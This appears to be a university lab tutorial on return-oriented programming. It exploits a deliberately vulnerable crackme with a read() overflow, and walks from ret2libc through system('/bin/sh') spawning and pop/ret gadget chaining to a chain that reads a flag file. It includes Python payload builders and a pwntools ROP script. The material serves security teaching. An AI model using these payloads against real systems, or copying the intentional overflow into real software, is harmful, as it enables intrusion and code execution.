In Lab 5, we learned that even when data execution prevention (DEP) and address-space layout randomization (ASLR) are applied, there can still be application-specific exploits that lead to full control-flow hijacking. In this tutorial, we'll learn a more generic technique called "return-oriented programming" (ROP), which can perform reasonably arbitrary computation without injecting any shellcode.
To make our tutorial easier, we'll assume code pointers are already leaked (e.g., system() and printf() in the libc library).
#include <dlfcn.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void start() {
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  char buf[32];
  memset(buf, 0, sizeof(buf));
  /* Overflow: reads up to 256 bytes into a 32-byte buffer. */
  read(0, buf, 256);

  if (!strcmp(buf, "250382"))
    printf("Password OK :)\n");
  else
    printf("Invalid Password!\n");
}

int main(int argc, char *argv[]) {
  void *self = dlopen(NULL, RTLD_NOW);
  printf("stack : %p\n", &argc);
  printf("system(): %p\n", dlsym(self, "system"));
  printf("printf(): %p\n", dlsym(self, "printf"));

  start();

  return 0;
}
$ checksec ./target
[*] '/home/lab06/tut06-rop/target'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
Notice that NX is enabled, meaning that shellcode placed on the stack or heap cannot be executed. However, the stack protector (canary) is disabled, so we can still overwrite a return address and initiate a control-flow hijacking attack.
Previously, we could compute anything we wanted (such as launching an interactive shell) by jumping into our injected shellcode, but with DEP enabled, we can no longer achieve that. However, it turns out that DEP alone is still not powerful enough to completely prevent this problem.
Let's take the first step by learning a technique often called "ret-to-libc."
$ ./target
stack : 0xffdcba40
system(): 0xf7d3e200
printf(): 0xf7d522d0
IOLI Crackme Level 0x00
Password:
[Task] Your first task is to trigger a buffer overflow and print out "Password OK :)"!
Your payload should look like this:
[ buf ]
[ ... ]
[ ra  ] -> printf()
[dummy]
[arg 1] -> "Password OK :)"
When start() returns, it will jump to our chosen return address as before, but this time we've selected the address of printf() as the target -- that is, we're setting up a call to printf(). To do that properly, we need a dummy stack value as a placeholder for the return address that would normally be put there when a function is called with the call instruction, followed by the function's actual argument(s).
Thus, when printf() is invoked with the payload outlined above, "Password OK :)" will be read as its first argument. As this exploit "returns" to a libc function, this technique is often called "ret-to-libc".
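The layout above can be sketched in Python using only the standard library. This is a rough illustration, not a working exploit: the padding length (`OFFSET_TO_RA`) and the address of the "Password OK :)" string are placeholders that you would have to measure yourself (e.g., in a debugger), and the printf() address is simply the one from the sample run above, which changes on every execution.

```python
import struct

def p32(value):
    """Pack an integer as a 32-bit little-endian word (i386 byte order)."""
    return struct.pack("<I", value)

def ret2libc_payload(offset_to_ra, func_addr, arg_addr, dummy=0x41414141):
    """Build: padding | ra -> func | dummy return address | arg 1."""
    payload = b"A" * offset_to_ra   # fills buf and everything up to the saved ra
    payload += p32(func_addr)       # overwritten return address: start() "returns" here
    payload += p32(dummy)           # where func itself would return to (placeholder)
    payload += p32(arg_addr)        # what func sees as its first argument
    return payload

# Illustrative values only
OFFSET_TO_RA = 44                   # assumption: find the real distance yourself
PRINTF_ADDR = 0xf7d522d0            # leaked in the sample run; differs per execution
PASSWORD_OK_STR = 0x08048000        # assumption: placeholder, not the real string address

payload = ret2libc_payload(OFFSET_TO_RA, PRINTF_ADDR, PASSWORD_OK_STR)
print(len(payload))
```

Keeping the layout in one small function makes it easy to swap in a different function address and argument later.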
Let's get a shell out of this vulnerability. To do this, we're simply going to invoke the system() function instead of printf(). (Check "man system" if you're not familiar with it.)
You can easily adapt the previous payload by replacing printf()'s address with that of system(), and changing the string argument:
[ buf ]
[ ... ]
[ ra  ] -> system()
[dummy]
[arg 1] -> "/bin/sh"
But how do we get a pointer to "/bin/sh"? In fact, a typical process (and libc) actually contains lots of strings like that. After all, this is how system() itself is implemented -- it essentially invokes system calls like fork() and execve() on "/bin/sh" with provided arguments (you can look at its actual implementation in glibc or musl if you're interested).
pwndbg provides a convenient interface to search for a string in memory:
$ gdb-pwndbg ./target
...
pwndbg> r
Starting program: /home/lab06/tut06-rop/target
stack : 0xffffd540
system(): 0xf7e1a250
printf(): 0xf7e2e3a0
IOLI Crackme Level 0x00
Password:^C
...
pwndbg> search "/bin"
libc-2.27.so    0xf7f5b3cf das     /* '/bin/sh' */
libc-2.27.so    0xf7f5c8b9 das     /* '/bin:/usr/bin' */
libc-2.27.so    0xf7f5c8c2 das     /* '/bin' */
libc-2.27.so    0xf7f5cdc7 das     /* '/bin/csh' */
...
There are many strings here you can use as an argument to system(). Note that all of these pointers will be different on each execution, thanks to libc's ASLR.
Our goal is to invoke system("/bin/sh") like this:
[ buf ]
[ ... ]
[ ra  ] -> system() (address provided by binary: 0xf7e1a250)
[dummy]
[arg 1] -> "/bin/sh" (found address by searching: 0xf7f5b3cf)
Unfortunately though, as mentioned, the addresses keep changing. So how can we figure out the correct address of the "/bin/sh" string for a particular invocation of target?
As you learned from the "libbase" challenge in Lab 5, ASLR doesn't randomize offsets within a module; it only randomizes the base address of the module as a whole. (Do you know why?) So while libc as a whole has an unpredictable address, the difference between any two libc addresses will always be the same. Therefore, if you can learn the address of anything in libc, you can calculate the address of anything else in it:
0xf7f5b3cf ("/bin/sh") - 0xf7e1a250 (system()) = 0x14117f
So in your exploit, you can use system()'s address to calculate that of "/bin/sh" (e.g., (system()) + 0x14117f = ("/bin/sh")).
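As a small sketch of that arithmetic, the snippet below derives the constant distance from the two addresses seen in the pwndbg session and applies it to a different leak. The second leaked address is made up for illustration, and the distance only holds for this exact libc build.

```python
# Addresses observed in the single pwndbg session shown above
SYSTEM_SEEN = 0xf7e1a250
BINSH_SEEN = 0xf7f5b3cf

# The distance between two addresses in the same module never changes
DELTA = BINSH_SEEN - SYSTEM_SEEN

def binsh_from_system(leaked_system):
    """Derive the "/bin/sh" address from a system() address leaked at run time."""
    return leaked_system + DELTA

# Hypothetical leak from another run (made-up value, same libc assumed)
other_leak = 0xf7d5a250

print(hex(DELTA))
print(hex(binsh_from_system(other_leak)))
```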
By the way, you can also calculate system()'s address (0xf7e1a250) "by hand", by finding libc's base address and system()'s offset in the library. Try vmmap in pwndbg:
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 0x8048000  0x8049000 r-xp     1000 0      /home/lab06/tut06-rop/target
 0x8049000  0x804a000 r--p     1000 0      /home/lab06/tut06-rop/target
 0x804a000  0x804b000 rw-p     1000 1000   /home/lab06/tut06-rop/target
0xf7ddd000 0xf7fb2000 r-xp   1d5000 0      /usr/local/lib/i386-linux-gnu/libc-2.27.so
0xf7fb2000 0xf7fb3000 ---p     1000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so
0xf7fb3000 0xf7fb5000 r--p     2000 1d5000 /usr/local/lib/i386-linux-gnu/libc-2.27.so
0xf7fb5000 0xf7fb6000 rw-p     1000 1d7000 /usr/local/lib/i386-linux-gnu/libc-2.27.so
...
The base address of libc (the start of its first mapped region) is 0xf7ddd000. The "x" in the "r-xp" permission bits for that region tells you that it's eXecutable (i.e., code).
Now we know libc's base address, but where is system() located within it? You can find that with readelf like so:
$ readelf -s /usr/local/lib/i386-linux-gnu/libc-2.27.so | grep system
   254: 00129870   102 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   652: 0003d250    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1510: 0003d250    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
0x0003d250 is the beginning of the system() function inside libc, so libc's base address plus 0x0003d250 should be the address we observed previously.
0xf7ddd000 (base) + 0x0003d250 (offset) = 0xf7e1a250 (system())
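Going the other way, a leaked system() address minus its offset should give libc's base. The sketch below parses the banner that target prints and adds a page-alignment sanity check. The helper names are hypothetical, and the offset is the one from the readelf output above, so it only applies to that libc build.

```python
import re

SYSTEM_OFFSET = 0x3d250   # from the readelf output above (this libc build only)
PAGE_MASK = 0xfff         # modules are mapped at 4 KiB page boundaries

def parse_leak(banner, name):
    """Extract the address that target prints as '<name>(): 0x...'."""
    match = re.search(re.escape(name) + r"\(\): (0x[0-9a-f]+)", banner)
    if match is None:
        raise ValueError("no leak found for " + name)
    return int(match.group(1), 16)

def libc_base_from_system(leaked_system):
    """Subtract the known offset; an unaligned result signals a mismatch."""
    base = leaked_system - SYSTEM_OFFSET
    if base & PAGE_MASK:
        raise ValueError("base is not page-aligned: wrong libc or wrong leak?")
    return base

# Banner text as printed in the pwndbg session above
banner = "stack : 0xffffd540\nsystem(): 0xf7e1a250\nprintf(): 0xf7e2e3a0\n"
base = libc_base_from_system(parse_leak(banner, "system"))
print(hex(base))
```

The alignment check is a cheap way to notice that an offset came from a different libc than the one the process actually loaded.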
[Task] Can you calculate libc's base address from a leaked system() address from target? And what's the offset of "/bin/sh" in libc? Can you successfully invoke the shell?
Generating a segfault after exploitation is a bit unfortunate, so let's make the hijacked binary terminate gracefully. Our plan is to chain two library calls. This is the next step toward generic computation.
Let's chain exit() after system(), like so:
system("/bin/sh");
exit(0);
Let's think about what happens when system("/bin/sh") returns -- that is, when you exit the shell (by typing "exit" or Ctrl+C).
Have you noticed that the IP gets set to the "dummy" value when the program crashes? In other words, you can control the next return address and use this to chain an additional function call. What if we set "dummy" to the address of exit()?
[ buf ]
[ ... ]
[ra 1 ] -> (1) system()
[ra 2 ] ---------------------> (2) exit()
[arg 1] -> (1) "/bin/sh"
[arg 2] ---------------------> (2) 0
When system() returns, exit() will be invoked next. You can even control its argument, as shown above (arg 2 (i.e., the argument for the second call) = 0).
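Here is a minimal sketch of that interleaved layout, again with the standard library only. The system() and "/bin/sh" addresses are the ones from the pwndbg session above; `EXIT_ADDR` and `OFFSET_TO_RA` are placeholders. Note that the zero argument puts NUL bytes in the payload, which is acceptable here because target reads its input with read() rather than a string function.

```python
import struct

MAX_INPUT = 256   # target calls read(0, buf, 256)

def chain_two_calls(offset_to_ra, func1, arg1, func2, arg2):
    """Lay out: padding | ra 1 | ra 2 | arg 1 | arg 2."""
    words = [func1, func2, arg1, arg2]
    payload = b"A" * offset_to_ra
    payload += b"".join(struct.pack("<I", word) for word in words)
    if len(payload) > MAX_INPUT:
        raise ValueError("payload is longer than what read() will accept")
    return payload

SYSTEM_ADDR = 0xf7e1a250   # from the pwndbg session above
BINSH_ADDR = 0xf7f5b3cf    # from the pwndbg search above
EXIT_ADDR = 0x42424242     # assumption: placeholder; computing the real one is the task
OFFSET_TO_RA = 44          # assumption: find the real distance yourself

payload = chain_two_calls(OFFSET_TO_RA, SYSTEM_ADDR, BINSH_ADDR, EXIT_ADDR, 0)
print(payload[OFFSET_TO_RA:].hex())
```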
[Task] Try it! You should be able to calculate the address of exit() using the techniques discussed earlier.
Unfortunately, this chaining scheme will stop working after the second call.
This week, you'll learn more generic and powerful techniques that let your payloads keep going even further. Since you're using return addresses to create a sequence of function calls, this is known as return-oriented programming (ROP).
Consider what would happen if the second function was something other than exit(), and execution continued:
[ buf ]
[ ... ]
[ra 1 ] -> (1) func1()
[ra 2 ] ---------------------> (2) func2()
[arg 1] -> (1) arg1
[arg 2] ---------------------> (2) arg2
The sequence of events is this:
1. func1(arg1)
2. func2(arg2)
3. After func2(arg2), "arg1" will be the next return address in this payload.
Time to learn a neat trick, a "pop/ret gadget":
[ buf ]
[ ... ]
[ra 1 ] -> (1) func1()
[ra 2 ] ---------------------> (2) pop/ret gadget
[arg 1] -> (1) arg1
[dummy]
This results in a crash at dummy!
A "pop/ret gadget" is just a pop instruction (e.g., pop eax) followed by a ret instruction. By pointing the second return address to that, the binary will (1) call func1(arg1), (2) pop "arg1" (so now the stack pointer points to "dummy"), and (3) return again (i.e., crash at "dummy").
Then we can put the actual second function address there:
[ buf ]
[ ... ]
[ra 1 ] -> (1) func1()
[ra 2 ] -----------------> (2) pop/ret gadget
[arg 1] -> (1) arg1
[ra 3 ] ---------------------------------------> (3) func2()
[dummy]
[arg 2] ---------------------------------------> (3) arg2
When we reach "ra 3", we've essentially gone back to the very first state in which we hijacked the control flow by smashing the stack. So in order to chain func2(), we can hijack the control-flow again in the same way. (And then we could follow that with another pop/ret gadget if we wanted to call a third function, and so on!)
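To see why the pop/ret gadget matters, it can help to trace the stack by hand. The toy simulator below is only a model: it treats the payload as a list of words, assumes cdecl functions that leave their arguments on the stack, and uses made-up addresses. It walks the words the way successive ret instructions would and records each call.

```python
def simulate(stack, funcs, gadgets):
    """Walk a list of 32-bit stack words the way repeated `ret`s would.

    funcs:   {address: (name, number_of_args)}  cdecl functions
    gadgets: {address: number_of_pops}          "pop ...; ret" gadgets
    """
    trace = []
    esp = 0                               # index of the word the next `ret` pops
    while esp < len(stack):
        target = stack[esp]               # `ret` pops the return address
        esp += 1
        if target in funcs:
            name, nargs = funcs[target]
            # On entry, stack[esp] is the callee's return address; args follow it.
            args = tuple(stack[esp + 1:esp + 1 + nargs])
            trace.append((name, args))
            # The callee's own `ret` pops only its return address (next iteration).
        elif target in gadgets:
            esp += gadgets[target]        # each `pop` discards one word
        else:
            trace.append(("crash", (target,)))
            break
    return trace

# Made-up addresses and values, for illustration only
FUNC1, FUNC2, POP_RET = 0x1000, 0x2000, 0x3000
ARG1, ARG2, DUMMY = 0xa1, 0xa2, 0xdead

funcs = {FUNC1: ("func1", 1), FUNC2: ("func2", 1)}
gadgets = {POP_RET: 1}

naive = simulate([FUNC1, FUNC2, ARG1, ARG2], funcs, gadgets)
fixed = simulate([FUNC1, POP_RET, ARG1, FUNC2, DUMMY, ARG2], funcs, gadgets)
print(naive)
print(fixed)
```

In the naive layout the trace ends by "returning" to arg1, while in the gadget layout it ends at the dummy slot, which is exactly where a further return address could go.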
Although pop/ret gadgets are everywhere (check pretty much any function!), a tool like ropper can search for all interesting gadgets for you.
$ ropper -f ./target
...
0x08048479: pop ebx; ret;
...
[Task] Can you chain system("/bin/sh") and exit(0) using the pop/ret gadget, like below?
[ buf ]
[ ... ]
[ra 1 ] -> (1) system()
[ra 2 ] -----------------> (2) pop/ret gadget
[arg 1] -> (1) "/bin/sh"
[ra 3 ] ---------------------------------------> (3) exit()
[dummy]
[arg 2] ---------------------------------------> (3) 0
By the way, ropper also provides a more convenient way to search for string addresses in an ELF:
$ ropper -f /usr/local/lib/i386-linux-gnu/libc-2.27.so --string "/bin/sh"

Strings
=======

Address     Value
-------     -----
0x0017e3cf  /bin/sh
Using this "gadget", we can keep chaining multiple functions together. We can also handle functions with more than one argument, like this:
[ buf ]
[ ... ]
[ra 1 ] -> (1) func1()
[ra 2 ] -----------------> (2) pop/ret gadget
[arg 1] -> (1) arg1
[ra 3 ] -> (3) func2()
[ra 4 ] -----------------> (4) pop/pop/ret gadget
[arg 2] -> (3) arg2
[arg 3] -> (3) arg3
[ra 5 ] ...
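Here the second call is func2(arg2, arg3), so it is followed by a pop/pop/ret gadget that skips both of its arguments.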
Every gadget (whether it's a whole function or just part of one) ends with a ret instruction, which is what gives return-oriented programming its name.
[Task] It's time to chain three functions! Can you invoke the three functions below in sequence?
printf("Password OK :)");
system("/bin/sh");
exit(0);
Your final job for today is to chain the following ROP payload:
open("/proc/flag", O_RDONLY);
read(3, tmp_buf, 1040);
write(1, tmp_buf, 1040);
More specifically, prepare the payload like this:
[ buf ]
[ ... ]
[ra 1 ] -> (1) open()
[ra 2 ] -----------------> (2) pop/pop/ret
[arg 1] -> (1) "/proc/flag"
[arg 2] -> (1) 0 (O_RDONLY)
[ra 3 ] -> (3) read()
[ra 4 ] -----------------> (4) pop/pop/pop/ret
[arg 3] -> (3) 3 (the new fd)
[arg 4] -> (3) tmp_buf
[arg 5] -> (3) 1040
[ra 5 ] -> (5) write()
[dummy]
[arg 6] -> (5) 1 (stdout)
[arg 7] -> (5) tmp_buf
[arg 8] -> (5) 1040
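The pattern in this layout is mechanical enough to generate. The helper below is a sketch, not the course's reference solution: `build_chain` and `pack_words` are hypothetical names, and every address is a made-up placeholder. After each call except the last, it places a gadget with one pop per argument, which reproduces the word order shown above.

```python
import struct

def build_chain(calls, pop_gadgets, dummy=0x41414141):
    """Turn [(func_addr, [args...]), ...] into a flat list of stack words.

    pop_gadgets maps a number of pops to the address of a matching
    "pop ...; ret" gadget. The final call gets a dummy return address.
    A non-final call with N arguments needs an entry for N.
    """
    words = []
    for index, (func, args) in enumerate(calls):
        is_last = index == len(calls) - 1
        words.append(func)
        # The gadget skips this call's arguments so `ret` reaches the next call.
        words.append(dummy if is_last else pop_gadgets[len(args)])
        words.extend(args)
    return words

def pack_words(words):
    """Pack the words as 32-bit little-endian values."""
    return b"".join(struct.pack("<I", word) for word in words)

# Placeholder addresses, for illustration only (none are real)
OPEN, READ, WRITE = 0x11110000, 0x22220000, 0x33330000
POP2_RET, POP3_RET = 0x44440000, 0x55550000
FLAG_PATH, TMP_BUF = 0x66660000, 0x77770000

chain = build_chain(
    [
        (OPEN, [FLAG_PATH, 0]),          # open("/proc/flag", O_RDONLY)
        (READ, [3, TMP_BUF, 1040]),      # read(3, tmp_buf, 1040)
        (WRITE, [1, TMP_BUF, 1040]),     # write(1, tmp_buf, 1040)
    ],
    {2: POP2_RET, 3: POP3_RET},
)
chain_bytes = pack_words(chain)
print([hex(word) for word in chain])
```

The packed bytes would still need the padding in front of them, and the whole payload has to fit within the 256 bytes that target reads.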
tmp_buf
"/proc/flag"
[Task] Exploit target-seccomp with your payload and submit the flag!
pwntools includes a very advanced ROP library for constructing ROP payloads. Take a look at the documentation for more details, but here's a quick tour:
#!/usr/bin/env python3

from pwn import *

# Override pwntools's default cache directory to your secret tmp directory
# (workaround for <https://github.com/Gallopsled/pwntools/issues/2072>)
os.environ['XDG_CACHE_HOME'] = './'

# Our ROP chain will use gadgets from the following ELFs
rop = ROP([ELF('/home/lab06/tut06-rop/target'),
           ELF('/usr/local/lib/i386-linux-gnu/libc-2.27.so')])

# Write a ROP chain that calls some libc functions!
rop.call('system', ['/bin/sh'])
rop.call('exit', [0])

# Pretty-print the finished payload
print(rop.dump())

# Convert it to bytes
payload = rop.chain()
print(payload)
Example output:
0x0000:          0x3d250 system(['/bin/sh'])
0x0004:          0x2c58a <adjust @0xc> add esp, 4; ret
0x0008:             0x18 arg0
0x000c:          0x30420 exit(0)
0x0010:          b'eaaa' <return address>
0x0014:              0x0 arg0
0x0018:   b'/bin/sh\x00'

b'P\xd2\x03\x00\x8a\xc5\x02\x00\x18\x00\x00\x00 \x04\x03\x00eaaa\x00\x00\x00\x00/bin/sh\x00'
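This is a very convenient tool: as the example output shows, it can look up functions such as system() and exit() by name, insert a stack-adjusting gadget (add esp, 4; ret) between the calls, and place the "/bin/sh" string in the payload for you.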
But just like with pwntools's format-string exploit generator, you have to know how to use it properly, how to debug when things go wrong, and how to write ROP chains manually if you encounter a situation the library can't handle. In fact, the payload produced by the code above will not work as-is -- can you figure out why? (Hint: search the documentation for "base".)
There exists a tool called OneGadget, which searches the glibc ELF for individual gadgets that can launch a shell. We strongly recommend against using it, as it can make several of the challenges too easy. We want you to learn how to write ROP chains instead of just using an automatic tool that can do it for you. But keep it in mind if you ever play similar CTF challenges outside of our class in the future!